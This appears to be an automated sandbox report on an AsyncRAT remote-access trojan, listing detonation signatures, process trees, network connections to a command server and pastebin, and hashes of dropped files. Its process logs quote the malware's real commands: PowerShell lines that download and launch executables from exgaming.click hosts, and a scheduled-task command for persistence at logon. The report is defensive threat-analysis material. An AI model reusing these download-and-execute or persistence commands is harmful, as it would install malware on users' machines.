Analysis Overview
SHA256
16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
Threat Level: Known bad
The file a7d63348cfe9b0dc9d3aaec28c76c8f0.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Asyncrat family
Async RAT payload
Async RAT payload
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Unsigned PE
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-17 11:36
Signatures
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Asyncrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-17 11:36
Reported
2024-04-17 11:38
Platform
win7-20240221-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe
"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8D80.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp |
Files
memory/2184-0-0x0000000001030000-0x0000000001048000-memory.dmp
memory/2184-1-0x000007FEF5720000-0x000007FEF610C000-memory.dmp
memory/2184-7-0x0000000000CA0000-0x0000000000D20000-memory.dmp
memory/2932-8-0x00000000029F0000-0x0000000002A70000-memory.dmp
memory/2932-9-0x000000001B140000-0x000000001B422000-memory.dmp
memory/2932-10-0x0000000002700000-0x0000000002708000-memory.dmp
memory/2932-11-0x000007FEED770000-0x000007FEEE10D000-memory.dmp
memory/2932-12-0x00000000029F0000-0x0000000002A70000-memory.dmp
memory/2932-13-0x000007FEED770000-0x000007FEEE10D000-memory.dmp
memory/2932-14-0x00000000029F0000-0x0000000002A70000-memory.dmp
memory/2932-15-0x00000000029F0000-0x0000000002A70000-memory.dmp
memory/2184-16-0x0000000077200000-0x00000000773A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp8D80.tmp.bat
| MD5 | 260f80c17b07c7f932ab0fb8b35fef12 |
| SHA1 | 8edad7745030341383628525fe93a0db2bcafb3e |
| SHA256 | 76b926550be74146c6ea147230c3537f110350b5bfa97c44967a62e663c030cf |
| SHA512 | 8ee8c14e807f54e4abf3daf1ff6d5d47cbbc6c325195630d48690d87f555821b248464ae7494075762302b73137bcab4fb3ec15f2f6967ccd6a11988198cb212 |
memory/2184-26-0x000007FEF5720000-0x000007FEF610C000-memory.dmp
memory/2184-27-0x0000000077200000-0x00000000773A9000-memory.dmp
memory/2932-28-0x000007FEED770000-0x000007FEEE10D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | dd359118062db8379da3d8bd9118b9de |
| SHA1 | 149fd1ee58fca63c4d6a0ae0922c0aecb3d42a91 |
| SHA256 | 4a4bbf16c5e38efe52ba8c0ae14121edf43635850f52a96460d392a3b12e2507 |
| SHA512 | 0afc7f24ce18b1501ef548c5e61edae81c0b09718c78da439f7ba9b57f64131a7152b3be4dfc1ba1c10bf6f49b0978bab9f0c1f7351a911ea5e19db76926f58e |
memory/2456-35-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2456-34-0x000000001B200000-0x000000001B4E2000-memory.dmp
memory/2456-36-0x0000000002320000-0x0000000002328000-memory.dmp
memory/2456-37-0x0000000002620000-0x00000000026A0000-memory.dmp
memory/2456-39-0x0000000002620000-0x00000000026A0000-memory.dmp
memory/2456-38-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2456-40-0x0000000002620000-0x00000000026A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\system.exe
| MD5 | a7d63348cfe9b0dc9d3aaec28c76c8f0 |
| SHA1 | 1b993f554960286e90cfd7cedf4c457e1c46ff80 |
| SHA256 | 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54 |
| SHA512 | 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010 |
memory/1908-44-0x0000000000320000-0x0000000000338000-memory.dmp
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
memory/1908-46-0x000007FEEE1B0000-0x000007FEEEB9C000-memory.dmp
memory/1908-47-0x000000001ADB0000-0x000000001AE30000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2656-55-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2656-54-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2656-56-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2656-58-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2656-59-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2656-57-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2456-60-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/1908-61-0x0000000077200000-0x00000000773A9000-memory.dmp
memory/1892-67-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/1892-68-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/1892-69-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/1892-71-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/1892-72-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/1892-70-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/1892-73-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2656-74-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2352-86-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp
memory/2352-88-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp
memory/2352-89-0x00000000026A0000-0x0000000002720000-memory.dmp
memory/2352-87-0x00000000026A0000-0x0000000002720000-memory.dmp
memory/1628-91-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp
memory/1628-93-0x0000000002650000-0x00000000026D0000-memory.dmp
memory/2352-95-0x00000000026A0000-0x0000000002720000-memory.dmp
memory/1628-94-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp
memory/1908-96-0x000007FEEE1B0000-0x000007FEEEB9C000-memory.dmp
memory/1628-92-0x0000000002650000-0x00000000026D0000-memory.dmp
memory/1628-90-0x000000000265B000-0x00000000026C2000-memory.dmp
memory/2352-97-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp
memory/2896-104-0x0000000002970000-0x00000000029F0000-memory.dmp
memory/2896-103-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2896-105-0x0000000002970000-0x00000000029F0000-memory.dmp
memory/1908-107-0x000000001ADB0000-0x000000001AE30000-memory.dmp
memory/2896-109-0x0000000002970000-0x00000000029F0000-memory.dmp
memory/2896-108-0x0000000002970000-0x00000000029F0000-memory.dmp
memory/2896-106-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2896-110-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/3032-116-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp
memory/3032-117-0x0000000002420000-0x00000000024A0000-memory.dmp
memory/3032-118-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-17 11:36
Reported
2024-04-17 11:38
Platform
win10v2004-20240226-en
Max time kernel
151s
Max time network
150s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe
"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1CE9.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3100 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| FR | 51.254.53.24:4449 | tcp | |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| GB | 142.250.187.202:443 | tcp | |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp | |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
memory/4620-0-0x0000000000D30000-0x0000000000D48000-memory.dmp
memory/4620-1-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/4620-3-0x000000001BB30000-0x000000001BB40000-memory.dmp
memory/4280-9-0x000001C2EA480000-0x000001C2EA4A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zjgwexnp.iti.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4280-16-0x000001C2EA4E0000-0x000001C2EA4F0000-memory.dmp
memory/4280-15-0x000001C2EA4E0000-0x000001C2EA4F0000-memory.dmp
memory/4280-17-0x000001C2EA4E0000-0x000001C2EA4F0000-memory.dmp
memory/4280-11-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/4280-20-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/5412-22-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/4620-27-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp
memory/4620-34-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8432f55d21c034cd767d75efdbd407e0 |
| SHA1 | d2163aac34f4277bd55162f2609c853348852869 |
| SHA256 | 62f2b61b88e4cfae117a2bb2f93201b161ef0260de36492bb75194edb4bae27e |
| SHA512 | 6c191d49f01f7efba21f0dd438fe57efb1a9051ecd39adcaddf983341e1e0cd9740013fc56af43b4bb84e602320af27e756685b6b02e60adc2d6c611c4739368 |
memory/5412-41-0x0000024479240000-0x0000024479250000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp1CE9.tmp.bat
| MD5 | 68b8b3004c6cd9d6c23277ee80ba3104 |
| SHA1 | 5c6e6426152be638eedceaf4ecd72c295ebde0ff |
| SHA256 | 48d4ce6ac7e27d8aeea2591a039c43a47d8e450298858dae16ce6ca40d970b7f |
| SHA512 | f01d9b573767cf80a0f9bbaafb662d0ff1ca7183c629317f35b4bea18d154b9ba9f96fb8a637d4949480de6befb1265ea8bb9739198623d8ee1b6cb8c9ff0dc3 |
memory/4620-38-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp
memory/5412-43-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/644-44-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/644-45-0x000002B36A990000-0x000002B36A9A0000-memory.dmp
memory/644-46-0x000002B36A990000-0x000002B36A9A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4150afd1b9345ce6edfd6aedae150451 |
| SHA1 | 000189275d81e61d1ea98dbf3d58e7714d4479a0 |
| SHA256 | 6bb91fceb4307177c9a3809b99e030a03d51d9ff560c5d64593754e219092322 |
| SHA512 | 6e56bdd5705253d0d80e58cbd750086fbc2dc4da963e122e00fdd9edf58fada2c91915f16f3d505d65b9963bfbc4a1e9c31808befcaeaf5b8045cf1166a263fb |
C:\Users\Admin\AppData\Roaming\system.exe
| MD5 | a7d63348cfe9b0dc9d3aaec28c76c8f0 |
| SHA1 | 1b993f554960286e90cfd7cedf4c457e1c46ff80 |
| SHA256 | 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54 |
| SHA512 | 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010 |
memory/4956-60-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
memory/644-64-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/4020-65-0x0000016FAA3D0000-0x0000016FAA3E0000-memory.dmp
memory/4020-66-0x0000016FAA3D0000-0x0000016FAA3E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a0c1a3be9951c0898306fdf9d0c03fc7 |
| SHA1 | 679a9ecccb4ac2e958a1ed8278f4c495afe41060 |
| SHA256 | 3ec7afe6d748866326bc1423e0de8f1612cd15851de9240b8f1405884239bdf5 |
| SHA512 | 38d9de07c7f5e010bce0898e2d4866cede51ab213e4d89cd9f1a19dc98358d29038f44c7ff4f12d26ffabb260bb37c125729fa5f6b7d74a9cd11186af3e10fc8 |
memory/4020-63-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/5076-77-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/5076-87-0x000001A863E80000-0x000001A863E90000-memory.dmp
memory/4020-88-0x0000016FAA3D0000-0x0000016FAA3E0000-memory.dmp
memory/5076-89-0x000001A863E80000-0x000001A863E90000-memory.dmp
memory/5076-91-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b91d1b7b4c05d577a614c9626800beb9 |
| SHA1 | 9a93c28cfa2fe26a72a6352cbda4051901cfb482 |
| SHA256 | 7e787720dcaec31beb92ef72e98830ebccdf18839993e12383b574af54a8ef46 |
| SHA512 | 5aa49266a3d0e1007fec4e4264e951c520849563cbf3531b8654d96266e5c3b962ab52a19f6d3f3dd65802dd6e5c93fc49260b8b8e0f0567426fdd4495268e5a |
memory/4020-94-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/4520-96-0x0000015F6F1C0000-0x0000015F6F1D0000-memory.dmp
memory/4520-95-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/4956-106-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp
memory/4520-107-0x0000015F6F1C0000-0x0000015F6F1D0000-memory.dmp
memory/4520-109-0x0000015F6F1C0000-0x0000015F6F1D0000-memory.dmp
memory/4520-111-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/5000-112-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/5000-113-0x0000025CBE0E0000-0x0000025CBE0F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a39620b1b9c4536ebdbf57907a067201 |
| SHA1 | e4eb9beb60e8227150cd1c98e08f3ed6249c707c |
| SHA256 | b2682b856d4500c948c4cbe2c9d66fc542819c65bdbba5bb4b31a64443a12172 |
| SHA512 | f1074424435a81c8eb6b50fd22d5c636b79df86b04a144cd9025a1184936d48e45351998fd0bc7b27fe791212d8fd6e1ac237c3111446eaada92a98615c7a9e9 |
memory/4956-123-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/5000-125-0x0000025CBE0E0000-0x0000025CBE0F0000-memory.dmp
memory/5000-127-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/3604-128-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/3604-129-0x000001F797590000-0x000001F7975A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 585808c4bc3ca6d78d20f1e59bf096e0 |
| SHA1 | 5d682dbca5566031a416e3bfbc2acbab73dbd6dd |
| SHA256 | f2122b010a34d88662e0ebb2f9ffa4c33ec029a5ef5dc8dc2474caeb2944df25 |
| SHA512 | c65d6c0646a302e5658f9d7ce72419ca2c4108074a5fd41599f90755790f95992cbbca503e70f82b9ae079ed6a185add95520be08c992a95775bb593edfb61b9 |
memory/3604-140-0x000001F797590000-0x000001F7975A0000-memory.dmp
memory/3604-142-0x00007FFD84570000-0x00007FFD85031000-memory.dmp
memory/4956-143-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp